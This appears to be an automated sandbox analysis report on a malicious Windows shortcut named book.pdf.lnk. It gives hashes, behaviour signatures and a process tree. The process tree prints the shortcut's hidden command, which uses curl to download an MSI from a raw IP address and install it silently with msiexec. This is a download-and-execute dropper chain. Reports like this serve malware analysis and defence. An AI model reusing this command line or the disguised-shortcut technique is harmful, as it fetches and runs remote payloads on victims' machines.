8b3162141ac545fa0ae63777748973b8ee88bb8234a917d5fb3238d2c2ca963d

Resubmissions

24-08-2023 17:35

230824-v568qafh4y 3

23-08-2023 19:18

23-08-2023 19:16

21-08-2023 09:54

21-08-2023 00:59

Analysis

max time kernel
30s
max time network
35s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
23-08-2023 19:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

book.pdf.lnk
Size

1KB
MD5

0185e0fc2f505312001e1a65e6783908
SHA1

8e4cf0397ba32d233a515a5aca02751f6f9344c6
SHA256

8b3162141ac545fa0ae63777748973b8ee88bb8234a917d5fb3238d2c2ca963d
SHA512

1a484bb08401fd7476d37029fa753aa82af10aa702f30fa30568ff7eaf94b484e604bbff9f6b5a67179a7d708cf61bb767fa974e0a9f35e751d74d9a2dd4fefc

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of AdjustPrivilegeToken 32 IoCs

Processes:

msiexec.exemsiexec.exe

description	pid	process
Token: SeShutdownPrivilege	4248	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4248	msiexec.exe
Token: SeSecurityPrivilege	3056	msiexec.exe
Token: SeCreateTokenPrivilege	4248	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4248	msiexec.exe
Token: SeLockMemoryPrivilege	4248	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4248	msiexec.exe
Token: SeMachineAccountPrivilege	4248	msiexec.exe
Token: SeTcbPrivilege	4248	msiexec.exe
Token: SeSecurityPrivilege	4248	msiexec.exe
Token: SeTakeOwnershipPrivilege	4248	msiexec.exe
Token: SeLoadDriverPrivilege	4248	msiexec.exe
Token: SeSystemProfilePrivilege	4248	msiexec.exe
Token: SeSystemtimePrivilege	4248	msiexec.exe
Token: SeProfSingleProcessPrivilege	4248	msiexec.exe
Token: SeIncBasePriorityPrivilege	4248	msiexec.exe
Token: SeCreatePagefilePrivilege	4248	msiexec.exe
Token: SeCreatePermanentPrivilege	4248	msiexec.exe
Token: SeBackupPrivilege	4248	msiexec.exe
Token: SeRestorePrivilege	4248	msiexec.exe
Token: SeShutdownPrivilege	4248	msiexec.exe
Token: SeDebugPrivilege	4248	msiexec.exe
Token: SeAuditPrivilege	4248	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4248	msiexec.exe
Token: SeChangeNotifyPrivilege	4248	msiexec.exe
Token: SeRemoteShutdownPrivilege	4248	msiexec.exe
Token: SeUndockPrivilege	4248	msiexec.exe
Token: SeSyncAgentPrivilege	4248	msiexec.exe
Token: SeEnableDelegationPrivilege	4248	msiexec.exe
Token: SeManageVolumePrivilege	4248	msiexec.exe
Token: SeImpersonatePrivilege	4248	msiexec.exe
Token: SeCreateGlobalPrivilege	4248	msiexec.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

cmd.execmd.exe

description	pid	process	target process
PID 2288 wrote to memory of 3916	2288	cmd.exe	cmd.exe
PID 2288 wrote to memory of 3916	2288	cmd.exe	cmd.exe
PID 3916 wrote to memory of 3432	3916	cmd.exe	curl.exe
PID 3916 wrote to memory of 3432	3916	cmd.exe	curl.exe
PID 3916 wrote to memory of 4248	3916	cmd.exe	msiexec.exe
PID 3916 wrote to memory of 4248	3916	cmd.exe	msiexec.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\book.pdf.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2288
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c echo %cd% > C:\Users\Admin\AppData\Local\Temp\ruta.txt & echo eGz & echo zv & echo GMp & echo RC & curl -o C:\Users\Admin\AppData\Local\Temp\ffbjzugu.msi http://107.181.161.200:443/msiffbjzugu & msiexec /i C:\Users\Admin\AppData\Local\Temp\ffbjzugu.msi /quiet /qn
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3916
- - C:\Windows\system32\curl.exe
    curl -o C:\Users\Admin\AppData\Local\Temp\ffbjzugu.msi http://107.181.161.200:443/msiffbjzugu
    3⤵
    PID:3432
- - C:\Windows\system32\msiexec.exe
    msiexec /i C:\Users\Admin\AppData\Local\Temp\ffbjzugu.msi /quiet /qn
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4248

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3056

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\ffbjzugu.msi

Filesize
3B

MD5
8a80554c91d9fca8acb82f023de02f11

SHA1
5f36b2ea290645ee34d943220a14b54ee5ea5be5

SHA256
ca3d163bab055381827226140568f3bef7eaac187cebd76878e0b63e9e442356

SHA512
ca4b6defb8adcc010050bc8b1bb8f8092c4928b8a0fba32146abcfb256e4d91672f88ca2cdf6210e754e5b8ac5e23fb023806ccd749ac8b701f79a691f03c87a

Download Submit